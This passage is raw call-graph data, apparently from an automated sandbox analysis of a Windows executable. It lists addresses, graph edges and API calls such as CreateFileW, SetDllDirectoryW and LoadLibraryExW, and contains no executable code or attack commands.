79788->79837 79791 7ff8b7ff8b5e 79838 7ff8b7ff7270 26 API calls 79791->79838 79792 7ff8b7ff8b5c 79792->79739 79794 7ff8b7fe5b62 79793->79794 79795 7ff8b7fe5b4e 79793->79795 79794->79747 79797 7ff8b7fe9340 14 API calls 79795->79797 79797->79794 79806 7ff8b7ff0021 79798->79806 79801 7ff8b8112900 8 API calls 79802 7ff8b7ff0647 79801->79802 79802->79769 79803 7ff8b7ff01f0 CreateFileW 79803->79806 79806->79803 79807 7ff8b7ff0475 79806->79807 79810 7ff8b7ff03a8 79806->79810 79814 7ff8b7fed020 79806->79814 79820 7ff8b7fefa10 23 API calls new[] 79806->79820 79821 7ff8b7ff0800 20 API calls 79806->79821 79822 7ff8b7fe9340 14 API calls 79806->79822 79823 7ff8b7fed810 19 API calls 79807->79823 79809 7ff8b7ff04a0 79824 7ff8b80a5ae0 14 API calls 79809->79824 79810->79801 79812->79766 79813->79770 79815 7ff8b7fed05e 79814->79815 79816 7ff8b7fe6180 new[] 14 API calls 79815->79816 79819 7ff8b7fed0a7 79815->79819 79817 7ff8b7fed073 79816->79817 79818 7ff8b7fed07b memset 79817->79818 79817->79819 79818->79819 79819->79806 79820->79806 79821->79806 79822->79806 79823->79809 79824->79810 79825->79778 79828 7ff8b7ffdeef 79827->79828 79831 7ff8b7ffdfa4 79827->79831 79828->79831 79839 7ff8b7fffbb0 29 API calls 79828->79839 79830 7ff8b7ffdf5d 79830->79831 79840 7ff8b7ffd960 14 API calls 79830->79840 79831->79785 79834 7ff8b7ff43b8 79833->79834 79835 7ff8b7ff42c5 79833->79835 79834->79788 79834->79791 79835->79834 79836 7ff8b7ff43a1 memset 79835->79836 79836->79834 79837->79792 79838->79792 79839->79830 79840->79831 79841 7ff7e12d9961 79853 7ff7e12da3d8 79841->79853 79843 7ff7e12d9966 79844 7ff7e12d998d GetModuleHandleW 79843->79844 79845 7ff7e12d99d7 79843->79845 79844->79845 79851 7ff7e12d999a 79844->79851 79846 7ff7e12d9864 11 API calls 79845->79846 79847 7ff7e12d9a13 79846->79847 79848 7ff7e12d9a1a 79847->79848 79849 7ff7e12d9a30 11 API calls 79847->79849 79850 7ff7e12d9a2c 79849->79850 79851->79845 79852 7ff7e12d9a88 GetModuleHandleExW GetProcAddress FreeLibrary 79851->79852 79852->79845 79858 7ff7e12db150 45 API calls 3 library calls 79853->79858 79855 7ff7e12da3e1 79859 7ff7e12da504 45 API calls __CxxCallCatchBlock 79855->79859 79858->79855 79860 7ff8b8017d60 79861 7ff8b8017d7f 79860->79861 79862 7ff8b8017d72 79860->79862 79863 7ff8b8017dd2 79861->79863 79864 7ff8b8017d87 79861->79864 79873 7ff8b8015950 79863->79873 79889 7ff8b7fe9340 14 API calls 79864->79889 79866 7ff8b8017d98 79890 7ff8b7fe9340 14 API calls 79866->79890 79869 7ff8b8017dc2 79870 7ff8b8017e03 79879 7ff8b80a22e0 79870->79879 79872 7ff8b8017e2f 79874 7ff8b8015969 79873->79874 79875 7ff8b801596e 79873->79875 79891 7ff8b80154a0 60 API calls 79874->79891 79877 7ff8b8015988 79875->79877 79892 7ff8b8015850 18 API calls 79875->79892 79877->79870 79881 7ff8b80a22f4 79879->79881 79888 7ff8b80a24f8 79879->79888 79881->79888 79893 7ff8b80a26e0 79881->79893 79882 7ff8b80a23a1 79887 7ff8b80a23b8 79882->79887 79905 7ff8b804b040 16 API calls 79882->79905 79883 7ff8b80a2349 79883->79882 79899 7ff8b8002bb0 79883->79899 79887->79888 79906 7ff8b8041740 15 API calls 79887->79906 79888->79872 79889->79866 79890->79869 79891->79875 79892->79877 79894 7ff8b80a270f 79893->79894 79896 7ff8b80a277f 79894->79896 79907 7ff8b8004cf0 79894->79907 79896->79896 79898 7ff8b80a27e4 79896->79898 79919 7ff8b8041310 16 API calls 79896->79919 79898->79883 79900 7ff8b8002bc8 79899->79900 79901 7ff8b8004cf0 30 API calls 79900->79901 79903 7ff8b8002be3 79901->79903 79902 7ff8b7ff8a10 38 API calls 79904 7ff8b8002cb5 79902->79904 79903->79902 79903->79904 79904->79883 79905->79887 79908 7ff8b8004d17 79907->79908 79911 7ff8b8004d3c 79908->79911 79924 7ff8b8000270 21 API calls 79908->79924 79912 7ff8b8004d60 79911->79912 79925 7ff8b8004be0 21 API calls 79911->79925 79916 7ff8b8004dfc 79912->79916 79926 7ff8b7ffb1c0 26 API calls 79912->79926 79915 7ff8b8004e19 79915->79894 79920 7ff8b80048a0 79916->79920 79917 7ff8b8004d77 79917->79916 79927 7ff8b7ff7270 26 API calls 79917->79927 79919->79898 79922 7ff8b80048c5 79920->79922 79921 7ff8b80048d2 79921->79915 79922->79921 79928 7ff8b7ff7270 26 API calls 79922->79928 79924->79911 79925->79912 79926->79917 79927->79916 79928->79921 79929 7ff7e12ccc3c 79950 7ff7e12cce0c 79929->79950 79932 7ff7e12ccd88 80101 7ff7e12cd12c 7 API calls 2 library calls 79932->80101 79933 7ff7e12ccc58 __scrt_acquire_startup_lock 79935 7ff7e12ccd92 79933->79935 79942 7ff7e12ccc76 __scrt_release_startup_lock 79933->79942 80102 7ff7e12cd12c 7 API calls 2 library calls 79935->80102 79937 7ff7e12ccc9b 79938 7ff7e12ccd9d __CxxCallCatchBlock 79939 7ff7e12ccd21 79956 7ff7e12cd274 79939->79956 79941 7ff7e12ccd26 79959 7ff7e12c1000 79941->79959 79942->79937 79942->79939 80098 7ff7e12d9b2c 45 API calls 79942->80098 79948 7ff7e12ccd49 79948->79938 80100 7ff7e12ccf90 7 API calls 79948->80100 79949 7ff7e12ccd60 79949->79937 79951 7ff7e12cce14 79950->79951 79952 7ff7e12cce20 __scrt_dllmain_crt_thread_attach 79951->79952 79953 7ff7e12ccc50 79952->79953 79954 7ff7e12cce2d 79952->79954 79953->79932 79953->79933 79954->79953 80103 7ff7e12cd888 7 API calls 2 library calls 79954->80103 80104 7ff7e12ea4d0 79956->80104 79960 7ff7e12c1009 79959->79960 80106 7ff7e12d5484 79960->80106 79962 7ff7e12c37fb 80113 7ff7e12c36b0 79962->80113 79965 7ff7e12c3808 __vcrt_freefls 79968 7ff7e12cc550 _log10_special 8 API calls 79965->79968 79971 7ff7e12c3ca7 79968->79971 79969 7ff7e12c383c 79972 7ff7e12c1c80 49 API calls 79969->79972 79970 7ff7e12c391b 79973 7ff7e12c45c0 108 API calls 79970->79973 80099 7ff7e12cd2b8 GetModuleHandleW 79971->80099 79974 7ff7e12c385b 79972->79974 79975 7ff7e12c392b 79973->79975 80185 7ff7e12c8830 79974->80185 79977 7ff7e12c396a 79975->79977 80212 7ff7e12c7f90 79975->80212 80221 7ff7e12c2710 54 API calls _log10_special 79977->80221 79979 7ff7e12c388e 79987 7ff7e12c38bb __vcrt_freefls 79979->79987 80211 7ff7e12c89a0 40 API calls __vcrt_freefls 79979->80211 79981 7ff7e12c395d 79982 7ff7e12c3962 79981->79982 79983 7ff7e12c3984 79981->79983 79984 7ff7e12d004c 74 API calls 79982->79984 79985 7ff7e12c1c80 49 API calls 79983->79985 79984->79977 79988 7ff7e12c39a3 79985->79988 79989 7ff7e12c8830 14 API calls 79987->79989 79996 7ff7e12c38de __vcrt_freefls 79987->79996 79993 7ff7e12c1950 115 API calls 79988->79993 79989->79996 79991 7ff7e12c3a0b 80224 7ff7e12c89a0 40 API calls __vcrt_freefls 79991->80224 79995 7ff7e12c39ce 79993->79995 79994 7ff7e12c3a17 80225 7ff7e12c89a0 40 API calls __vcrt_freefls 79994->80225 79995->79974 79998 7ff7e12c39de 79995->79998 80002 7ff7e12c390e __vcrt_freefls 79996->80002 80223 7ff7e12c8940 40 API calls __vcrt_freefls 79996->80223 80222 7ff7e12c2710 54 API calls _log10_special 79998->80222 79999 7ff7e12c3a23 80226 7ff7e12c89a0 40 API calls __vcrt_freefls 79999->80226 80003 7ff7e12c8830 14 API calls 80002->80003 80004 7ff7e12c3a3b 80003->80004 80005 7ff7e12c3b2f 80004->80005 80006 7ff7e12c3a60 __vcrt_freefls 80004->80006 80228 7ff7e12c2710 54 API calls _log10_special 80005->80228 80010 7ff7e12c3aab 80006->80010 80227 7ff7e12c8940 40 API calls __vcrt_freefls 80006->80227 80009 7ff7e12c8830 14 API calls 80011 7ff7e12c3bf4 __vcrt_freefls 80009->80011 80010->80009 80012 7ff7e12c3d41 80011->80012 80013 7ff7e12c3c46 80011->80013 80233 7ff7e12c44e0 49 API calls 80012->80233 80014 7ff7e12c3c50 80013->80014 80015 7ff7e12c3cd4 80013->80015 80229 7ff7e12c90e0 59 API calls _log10_special 80014->80229 80018 7ff7e12c8830 14 API calls 80015->80018 80021 7ff7e12c3ce0 80018->80021 80019 7ff7e12c3d4f 80022 7ff7e12c3d71 80019->80022 80023 7ff7e12c3d65 80019->80023 80020 7ff7e12c3c55 80024 7ff7e12c3cb3 80020->80024 80027 7ff7e12c3c61 80020->80027 80021->80027 80028 7ff7e12c3ced 80021->80028 80026 7ff7e12c1c80 49 API calls 80022->80026 80234 7ff7e12c4630 80023->80234 80231 7ff7e12c8660 86 API calls 2 library calls 80024->80231 80040 7ff7e12c3d2b __vcrt_freefls 80026->80040 80230 7ff7e12c2710 54 API calls _log10_special 80027->80230 80031 7ff7e12c1c80 49 API calls 80028->80031 80036 7ff7e12c3d0b 80031->80036 80032 7ff7e12c3dc4 80037 7ff7e12c9390 2 API calls 80032->80037 80033 7ff7e12c3cbb 80034 7ff7e12c3cbf 80033->80034 80035 7ff7e12c3cc8 80033->80035 80034->80027 80035->80040 80039 7ff7e12c3d12 80036->80039 80036->80040 80038 7ff7e12c3dd7 SetDllDirectoryW 80037->80038 80044 7ff7e12c3e0a 80038->80044 80088 7ff7e12c3e5a 80038->80088 80232 7ff7e12c2710 54 API calls _log10_special 80039->80232 80040->80032 80041 7ff7e12c3da7 SetDllDirectoryW LoadLibraryExW 80040->80041 80041->80032 80045 7ff7e12c8830 14 API calls 80044->80045 80054 7ff7e12c3e16 __vcrt_freefls 80045->80054 80046 7ff7e12c4008 80048 7ff7e12c4012 PostMessageW GetMessageW 80046->80048 80049 7ff7e12c4035 80046->80049 80047 7ff7e12c3f1b 80245 7ff7e12c33c0 121 API calls 2 library calls 80047->80245 80048->80049 80198 7ff7e12c3360 80049->80198 80051 7ff7e12c3f23 80051->79965 80052 7ff7e12c3f2b 80051->80052 80246 7ff7e12c90c0 LocalFree 80052->80246 80057 7ff7e12c3ef2 80054->80057 80061 7ff7e12c3e4e 80054->80061 80244 7ff7e12c8940 40 API calls __vcrt_freefls 80057->80244 80061->80088 80237 7ff7e12c6dc0 54 API calls _get_daylight 80061->80237 80069 7ff7e12c405b 80070 7ff7e12c3e6c 80238 7ff7e12c7340 117 API calls 2 library calls 80070->80238 80074 7ff7e12c3e81 80077 7ff7e12c3ea2 80074->80077 80089 7ff7e12c3e85 80074->80089 80239 7ff7e12c6e00 120 API calls _log10_special 80074->80239 80077->80089 80240 7ff7e12c71b0 125 API calls 80077->80240 80082 7ff7e12c3ee0 80243 7ff7e12c6fc0 FreeLibrary 80082->80243 80083 7ff7e12c3eb7 80083->80089 80241 7ff7e12c74f0 55 API calls 80083->80241 80088->80046 80088->80047 80089->80088 80242 7ff7e12c2a50 54 API calls _log10_special 80089->80242 80098->79939 80099->79948 80100->79949 80101->79935 80102->79938 80103->79953 80105 7ff7e12cd28b GetStartupInfoW 80104->80105 80105->79941 80109 7ff7e12df480 80106->80109 80107 7ff7e12df4d3 80248 7ff7e12da814 37 API calls 2 library calls 80107->80248 80109->80107 80110 7ff7e12df526 80109->80110 80249 7ff7e12df358 71 API calls _fread_nolock 80110->80249 80112 7ff7e12df4fc 80112->79962 80250 7ff7e12cc850 80113->80250 80116 7ff7e12c3710 80252 7ff7e12c9280 FindFirstFileExW 80116->80252 80117 7ff7e12c36eb GetLastError 80257 7ff7e12c2c50 51 API calls _log10_special 80117->80257 80120 7ff7e12c3706 80125 7ff7e12cc550 _log10_special 8 API calls 80120->80125 80122 7ff7e12c3723 80258 7ff7e12c9300 CreateFileW GetFinalPathNameByHandleW CloseHandle 80122->80258 80123 7ff7e12c377d 80260 7ff7e12c9440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 80123->80260 80128 7ff7e12c37b5 80125->80128 80127 7ff7e12c3730 80130 7ff7e12c3734 80127->80130 80131 7ff7e12c374c __vcrt_FlsAlloc 80127->80131 80128->79965 80135 7ff7e12c1950 80128->80135 80129 7ff7e12c378b 80129->80120 80261 7ff7e12c2810 49 API calls _log10_special 80129->80261 80259 7ff7e12c2810 49 API calls _log10_special 80130->80259 80131->80123 80134 7ff7e12c3745 80134->80120 80136 7ff7e12c45c0 108 API calls 80135->80136 80137 7ff7e12c1985 80136->80137 80138 7ff7e12c1c43 80137->80138 80140 7ff7e12c7f90 83 API calls 80137->80140 80139 7ff7e12cc550 _log10_special 8 API calls 80138->80139 80141 7ff7e12c1c5e 80139->80141 80142 7ff7e12c19cb 80140->80142 80141->79969 80141->79970 80143 7ff7e12d06d4 73 API calls 80142->80143 80184 7ff7e12c1a03 80142->80184 80145 7ff7e12c19e5 80143->80145 80144 7ff7e12d004c 74 API calls 80144->80138 80146 7ff7e12c19e9 80145->80146 80147 7ff7e12c1a08 80145->80147 80262 7ff7e12d4f08 11 API calls _get_daylight 80146->80262 80149 7ff7e12d039c _fread_nolock 53 API calls 80147->80149 80151 7ff7e12c1a20 80149->80151 80150 7ff7e12c19ee 80263 7ff7e12c2910 54 API calls _log10_special 80150->80263 80153 7ff7e12c1a26 80151->80153 80154 7ff7e12c1a45 80151->80154 80264 7ff7e12d4f08 11 API calls _get_daylight 80153->80264 80157 7ff7e12c1a5c 80154->80157 80158 7ff7e12c1a7b 80154->80158 80156 7ff7e12c1a2b 80265 7ff7e12c2910 54 API calls _log10_special 80156->80265 80266 7ff7e12d4f08 11 API calls _get_daylight 80157->80266 80161 7ff7e12c1c80 49 API calls 80158->80161 80163 7ff7e12c1a92 80161->80163 80162 7ff7e12c1a61 80267 7ff7e12c2910 54 API calls _log10_special 80162->80267 80165 7ff7e12c1c80 49 API calls 80163->80165 80166 7ff7e12c1add 80165->80166 80167 7ff7e12d06d4 73 API calls 80166->80167 80168 7ff7e12c1b01 80167->80168 80169 7ff7e12c1b16 80168->80169 80170 7ff7e12c1b35 80168->80170 80268 7ff7e12d4f08 11 API calls _get_daylight 80169->80268 80172 7ff7e12d039c _fread_nolock 53 API calls 80170->80172 80174 7ff7e12c1b4a 80172->80174 80173 7ff7e12c1b1b 80269 7ff7e12c2910 54 API calls _log10_special 80173->80269 80176 7ff7e12c1b50 80174->80176 80177 7ff7e12c1b6f 80174->80177 80270 7ff7e12d4f08 11 API calls _get_daylight 80176->80270 80272 7ff7e12d0110 37 API calls 2 library calls 80177->80272 80180 7ff7e12c1b89 80180->80184 80273 7ff7e12c2710 54 API calls _log10_special 80180->80273 80181 7ff7e12c1b55 80271 7ff7e12c2910 54 API calls _log10_special 80181->80271 80184->80144 80186 7ff7e12c883a 80185->80186 80187 7ff7e12c9390 2 API calls 80186->80187 80188 7ff7e12c8859 GetEnvironmentVariableW 80187->80188 80189 7ff7e12c8876 ExpandEnvironmentStringsW 80188->80189 80190 7ff7e12c88c2 80188->80190 80189->80190 80191 7ff7e12c8898 80189->80191 80192 7ff7e12cc550 _log10_special 8 API calls 80190->80192 80274 7ff7e12c9440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 80191->80274 80194 7ff7e12c88d4 80192->80194 80194->79979 80195 7ff7e12c88aa 80196 7ff7e12cc550 _log10_special 8 API calls 80195->80196 80197 7ff7e12c88ba 80196->80197 80197->79979 80275 7ff7e12c6360 80198->80275 80201 7ff7e12c3399 80207 7ff7e12c3670 80201->80207 80203 7ff7e12c3381 80203->80201 80343 7ff7e12c6050 80203->80343 80205 7ff7e12c338d 80205->80201 80352 7ff7e12c61e0 54 API calls 80205->80352 80209 7ff7e12c367e 80207->80209 80208 7ff7e12c368f 80247 7ff7e12c6fc0 FreeLibrary 80208->80247 80209->80208 80406 7ff7e12c8e60 FreeLibrary 80209->80406 80211->79987 80213 7ff7e12c7fb4 80212->80213 80214 7ff7e12d06d4 73 API calls 80213->80214 80219 7ff7e12c808b __vcrt_freefls 80213->80219 80215 7ff7e12c7fd0 80214->80215 80215->80219 80407 7ff7e12d78c8 80215->80407 80217 7ff7e12d06d4 73 API calls 80220 7ff7e12c7fe5 80217->80220 80218 7ff7e12d039c _fread_nolock 53 API calls 80218->80220 80219->79981 80220->80217 80220->80218 80220->80219 80221->79965 80222->79965 80223->79991 80224->79994 80225->79999 80226->80002 80227->80010 80228->79965 80229->80020 80230->79965 80231->80033 80232->79965 80233->80019 80235 7ff7e12c1c80 49 API calls 80234->80235 80236 7ff7e12c4660 80235->80236 80236->80040 80237->80070 80238->80074 80239->80077 80240->80083 80241->80089 80242->80082 80243->80088 80244->80088 80245->80051 80247->80069 80248->80112 80249->80112 80251 7ff7e12c36bc GetModuleFileNameW 80250->80251 80251->80116 80251->80117 80253 7ff7e12c92bf FindClose 80252->80253 80254 7ff7e12c92d2 80252->80254 80253->80254 80255 7ff7e12cc550 _log10_special 8 API calls 80254->80255 80256 7ff7e12c371a 80255->80256 80256->80122 80256->80123 80257->80120 80258->80127 80259->80134 80260->80129 80261->80120 80262->80150 80263->80184 80264->80156 80265->80184 80266->80162 80267->80184 80268->80173 80269->80184 80270->80181 80271->80184 80272->80180 80273->80184 80274->80195 80276 7ff7e12c6375 80275->80276 80277 7ff7e12c1c80 49 API calls 80276->80277 80278 7ff7e12c63b1 80277->80278 80279 7ff7e12c63ba 80278->80279 80280 7ff7e12c63dd 80278->80280 80363 7ff7e12c2710 54 API calls _log10_special 80279->80363 80282 7ff7e12c4630 49 API calls 80280->80282 80283 7ff7e12c63f5 80282->80283 80284 7ff7e12c6413 80283->80284 80364 7ff7e12c2710 54 API calls _log10_special 80283->80364 80353 7ff7e12c4560 80284->80353 80286 7ff7e12cc550 _log10_special 8 API calls 80288 7ff7e12c336e 80286->80288 80288->80201 80306 7ff7e12c6500 80288->80306 80290 7ff7e12c642b 80292 7ff7e12c4630 49 API calls 80290->80292 80291 7ff7e12c8e80 3 API calls 80291->80290 80293 7ff7e12c6444 80292->80293 80294 7ff7e12c6469 80293->80294 80295 7ff7e12c6449 80293->80295 80359 7ff7e12c8e80 80294->80359 80365 7ff7e12c2710 54 API calls _log10_special 80295->80365 80298 7ff7e12c63d3 80298->80286 80299 7ff7e12c6476 80300 7ff7e12c6482 80299->80300 80301 7ff7e12c64c1 80299->80301 80303 7ff7e12c9390 2 API calls 80300->80303 80367 7ff7e12c5830 137 API calls 80301->80367 80304 7ff7e12c649a GetLastError 80303->80304 80366 7ff7e12c2c50 51 API calls _log10_special 80304->80366 80368 7ff7e12c5400 80306->80368 80308 7ff7e12c6526 80309 7ff7e12c653f 80308->80309 80310 7ff7e12c652e 80308->80310 80375 7ff7e12c4c90 80309->80375 80393 7ff7e12c2710 54 API calls _log10_special 80310->80393 80314 7ff7e12c655c 80318 7ff7e12c656c 80314->80318 80320 7ff7e12c657d 80314->80320 80315 7ff7e12c654b 80394 7ff7e12c2710 54 API calls _log10_special 80315->80394 80317 7ff7e12c653a 80317->80203 80395 7ff7e12c2710 54 API calls _log10_special 80318->80395 80321 7ff7e12c65ad 80320->80321 80322 7ff7e12c659c 80320->80322 80324 7ff7e12c65cd 80321->80324 80325 7ff7e12c65bc 80321->80325 80396 7ff7e12c2710 54 API calls _log10_special 80322->80396 80379 7ff7e12c4d50 80324->80379 80397 7ff7e12c2710 54 API calls _log10_special 80325->80397 80329 7ff7e12c65ed 80332 7ff7e12c660d 80329->80332 80333 7ff7e12c65fc 80329->80333 80330 7ff7e12c65dc 80398 7ff7e12c2710 54 API calls _log10_special 80330->80398 80335 7ff7e12c661f 80332->80335 80337 7ff7e12c6630 80332->80337 80399 7ff7e12c2710 54 API calls _log10_special 80333->80399 80400 7ff7e12c2710 54 API calls _log10_special 80335->80400 80340 7ff7e12c665a 80337->80340 80401 7ff7e12d72b0 73 API calls 80337->80401 80339 7ff7e12c6648 80402 7ff7e12d72b0 73 API calls 80339->80402 80340->80317 80403 7ff7e12c2710 54 API calls _log10_special 80340->80403 80344 7ff7e12c6070 80343->80344 80345 7ff7e12c6099 80344->80345 80351 7ff7e12c60b0 __vcrt_freefls 80344->80351 80405 7ff7e12c2710 54 API calls _log10_special 80345->80405 80347 7ff7e12c60a5 80347->80205 80348 7ff7e12c61bb 80348->80205 80349 7ff7e12c1470 116 API calls 80349->80351 80350 7ff7e12c2710 54 API calls 80350->80351 80351->80348 80351->80349 80351->80350 80352->80201 80354 7ff7e12c456a 80353->80354 80355 7ff7e12c9390 2 API calls 80354->80355 80356 7ff7e12c458f 80355->80356 80357 7ff7e12cc550 _log10_special 8 API calls 80356->80357 80358 7ff7e12c45b7 80357->80358 80358->80290 80358->80291 80360 7ff7e12c9390 2 API calls 80359->80360 80361 7ff7e12c8e94 LoadLibraryExW 80360->80361 80362 7ff7e12c8eb3 __vcrt_freefls 80361->80362 80362->80299 80363->80298 80364->80284 80365->80298 80366->80298 80367->80298 80370 7ff7e12c542c 80368->80370 80369 7ff7e12c5434 80369->80308 80370->80369 80373 7ff7e12c55d4 80370->80373 80404 7ff7e12d6aa4 48 API calls 80370->80404 80371 7ff7e12c5797 __vcrt_freefls 80371->80308 80372 7ff7e12c47d0 47 API calls 80372->80373 80373->80371 80373->80372 80376 7ff7e12c4cc0 80375->80376 80377 7ff7e12cc550 _log10_special 8 API calls 80376->80377 80378 7ff7e12c4d2a 80377->80378 80378->80314 80378->80315 80380 7ff7e12c4d65 80379->80380 80381 7ff7e12c1c80 49 API calls 80380->80381 80382 7ff7e12c4db1 80381->80382 80383 7ff7e12c4e33 __vcrt_freefls 80382->80383 80384 7ff7e12c1c80 49 API calls 80382->80384 80385 7ff7e12cc550 _log10_special 8 API calls 80383->80385 80386 7ff7e12c4df0 80384->80386 80387 7ff7e12c4e7e 80385->80387 80386->80383 80388 7ff7e12c9390 2 API calls 80386->80388 80387->80329 80387->80330 80389 7ff7e12c4e06 80388->80389 80390 7ff7e12c9390 2 API calls 80389->80390 80391 7ff7e12c4e1d 80390->80391 80392 7ff7e12c9390 2 API calls 80391->80392 80392->80383 80393->80317 80394->80317 80395->80317 80396->80317 80397->80317 80398->80317 80399->80317 80400->80317 80401->80339 80402->80340 80403->80317 80404->80370 80405->80347 80406->80208 80408 7ff7e12d78f8 80407->80408 80411 7ff7e12d73d4 80408->80411 80410 7ff7e12d7911 80410->80220 80412 7ff7e12d73ef 80411->80412 80413 7ff7e12d741e 80411->80413 80422 7ff7e12da814 37 API calls 2 library calls 80412->80422 80421 7ff7e12d546c EnterCriticalSection 80413->80421 80416 7ff7e12d740f 80416->80410 80417 7ff7e12d7423 80418 7ff7e12d7440 38 API calls 80417->80418 80419 7ff7e12d742f 80418->80419 80420 7ff7e12d5478 _fread_nolock LeaveCriticalSection 80419->80420 80420->80416 80422->80416 80423 7ff8b80434c0 80424 7ff8b80434fc 80423->80424 80425 7ff8b8043513 80423->80425 80426 7ff8b8043535 80424->80426 80427 7ff8b8043504 80424->80427 80428 7ff8b8043523 80425->80428 80560 7ff8b802e7e0 15 API calls 80425->80560 80430 7ff8b8043541 80426->80430 80441 7ff8b804357b 80426->80441 80559 7ff8b7fea500 14 API calls 80427->80559 80432 7ff8b8043576 80430->80432 80561 7ff8b7fea500 14 API calls 80430->80561 80433 7ff8b8043774 80432->80433 80440 7ff8b80436b8 80432->80440 80435 7ff8b804377f 80433->80435 80436 7ff8b8043793 80433->80436 80568 7ff8b7fea500 14 API calls 80435->80568 80443 7ff8b8047350 80436->80443 80563 7ff8b80472d0 80440->80563 80441->80432 80562 7ff8b7fea500 14 API calls 80441->80562 80444 7ff8b80473dc 80443->80444 80525 7ff8b80475c9 80443->80525 80444->80525 80569 7ff8b8064960 80444->80569 80445 7ff8b80484f7 80447 7ff8b804850c 80445->80447 80647 7ff8b802e7e0 15 API calls 80445->80647 80595 7ff8b8048e60 80447->80595 80452 7ff8b8048519 80455 7ff8b8112900 8 API calls 80452->80455 80453 7ff8b80472d0 14 API calls 80454 7ff8b8047411 80453->80454 80469 7ff8b80475d1 80454->80469 80454->80525 80573 7ff8b8041bd0 15 API calls 80454->80573 80456 7ff8b8048538 80455->80456 80456->80428 80458 7ff8b804743a 80470 7ff8b8047461 80458->80470 80458->80525 80602 7ff8b804b580 81 API calls 80458->80602 80459 7ff8b8047705 80460 7ff8b804770d 80459->80460 80461 7ff8b8047727 80459->80461 80605 7ff8b7fea500 14 API calls 80460->80605 80463 7ff8b804772b 80461->80463 80464 7ff8b8047745 80461->80464 80606 7ff8b7fea500 14 API calls 80463->80606 80467 7ff8b8047752 80464->80467 80468 7ff8b80478f6 80464->80468 80467->80525 80607 7ff8b7fe6880 80467->80607 80619 7ff8b7fe9170 80468->80619 80469->80459 80472 7ff8b8047691 80469->80472 80469->80525 80574 7ff8b8040d10 80470->80574 80604 7ff8b7fea500 14 API calls 80472->80604 80476 7ff8b804776f 80477 7ff8b804777c memcpy 80476->80477 80479 7ff8b80477a5 80476->80479 80477->80479 80479->80525 80614 7ff8b8041cb0 15 API calls 80479->80614 80481 7ff8b804792e 80482 7ff8b80479bf 80481->80482 80481->80525 80622 7ff8b803fbe0 14 API calls 80481->80622 80483 7ff8b8047ab9 80482->80483 80484 7ff8b80479dc 80482->80484 80482->80525 80507 7ff8b8047a7b 80483->80507 80625 7ff8b7fea500 14 API calls 80483->80625 80491 7ff8b7fe6880 14 API calls 80484->80491 80485 7ff8b80475b7 80603 7ff8b7fea500 14 API calls 80485->80603 80488 7ff8b804798f 80488->80525 80623 7ff8b803fbe0 14 API calls 80488->80623 80494 7ff8b8047a20 80491->80494 80492 7ff8b8047815 80492->80481 80493 7ff8b804786c 80492->80493 80496 7ff8b804784d 80492->80496 80492->80525 80493->80481 80497 7ff8b8047883 80493->80497 80495 7ff8b8047a60 80494->80495 80498 7ff8b8047a55 memcpy 80494->80498 80624 7ff8b802e1e0 15 API calls 80495->80624 80615 7ff8b7fea500 14 API calls 80496->80615 80502 7ff8b80478ab 80497->80502 80503 7ff8b804788f 80497->80503 80498->80495 80506 7ff8b80478dc 80502->80506 80617 7ff8b80496b0 55 API calls 80502->80617 80616 7ff8b7fea500 14 API calls 80503->80616 80618 7ff8b8041fa0 15 API calls 80506->80618 80507->80525 80587 7ff8b8047200 80507->80587 80508 7ff8b8047b8d memcpy 80510 7ff8b8047c08 80508->80510 80530 7ff8b8047c22 80508->80530 80626 7ff8b802afe0 14 API calls 80510->80626 80514 7ff8b8047ef9 80632 7ff8b8048550 memcpy 80514->80632 80516 7ff8b80480f0 80526 7ff8b804811b 80516->80526 80527 7ff8b8048266 80516->80527 80549 7ff8b8047e8c 80516->80549 80517 7ff8b8047e7d 80629 7ff8b7fea500 14 API calls 80517->80629 80519 7ff8b8047eb0 80519->80525 80631 7ff8b802e7e0 15 API calls 80519->80631 80521 7ff8b804814e 80633 7ff8b7feca10 15 API calls new[] 80521->80633 80523 7ff8b80482a7 80523->80549 80639 7ff8b8049880 55 API calls 80523->80639 80525->80445 80646 7ff8b802d150 15 API calls 80525->80646 80526->80521 80532 7ff8b804823a 80526->80532 80527->80523 80527->80549 80638 7ff8b8011cc0 15 API calls 80527->80638 80528 7ff8b8048161 80528->80549 80634 7ff8b7fe6c40 14 API calls 80528->80634 80529 7ff8b8047d9f memcpy 80529->80530 80530->80514 80530->80517 80530->80529 80530->80530 80530->80549 80627 7ff8b802afe0 14 API calls 80530->80627 80628 7ff8b804ab50 23 API calls 80530->80628 80636 7ff8b7fea500 14 API calls 80532->80636 80534 7ff8b80482c5 80640 7ff8b80120b0 14 API calls 80534->80640 80539 7ff8b80481c2 80539->80549 80635 7ff8b7fea500 14 API calls 80539->80635 80540 7ff8b8048249 80637 7ff8b80a5aa0 14 API calls 80540->80637 80541 7ff8b8047fb2 80541->80516 80541->80539 80544 7ff8b8048353 80641 7ff8b80404f0 15 API calls 80544->80641 80545 7ff8b80482d2 80545->80544 80546 7ff8b7fe9170 14 API calls 80545->80546 80546->80544 80548 7ff8b8048390 80548->80549 80642 7ff8b8046b90 44 API calls 80548->80642 80549->80519 80549->80525 80630 7ff8b802d150 15 API calls 80549->80630 80551 7ff8b80483b8 80643 7ff8b8043cd0 14 API calls 80551->80643 80553 7ff8b80483c4 80554 7ff8b7fe9170 14 API calls 80553->80554 80555 7ff8b80483db 80554->80555 80644 7ff8b8012a20 15 API calls 80555->80644 80557 7ff8b80483f0 80645 7ff8b8012190 14 API calls 80557->80645 80559->80425 80560->80428 80561->80432 80562->80441 80564 7ff8b8047305 80563->80564 80565 7ff8b80472dc 80563->80565 80564->80425 80565->80564 80928 7ff8b7fea500 14 API calls 80565->80928 80567 7ff8b804733e 80567->80425 80568->80425 80570 7ff8b8064979 80569->80570 80572 7ff8b80473fc 80569->80572 80648 7ff8b8064890 80570->80648 80572->80453 80572->80525 80573->80458 80575 7ff8b8040d41 80574->80575 80576 7ff8b8040d3c 80574->80576 80578 7ff8b8040e44 80575->80578 80583 7ff8b8040e48 80575->80583 80586 7ff8b8040e31 80575->80586 80894 7ff8b807e170 16 API calls new[] 80575->80894 80577 7ff8b8064960 76 API calls 80576->80577 80577->80575 80579 7ff8b8040e8a 80578->80579 80580 7ff8b8040ea0 80578->80580 80578->80583 80896 7ff8b7fea500 14 API calls 80579->80896 80897 7ff8b7fea500 14 API calls 80580->80897 80583->80469 80583->80485 80583->80525 80586->80578 80895 7ff8b807ffc0 19 API calls new[] 80586->80895 80588 7ff8b804724f 80587->80588 80589 7ff8b8047245 80587->80589 80591 7ff8b7fe6180 new[] 14 API calls 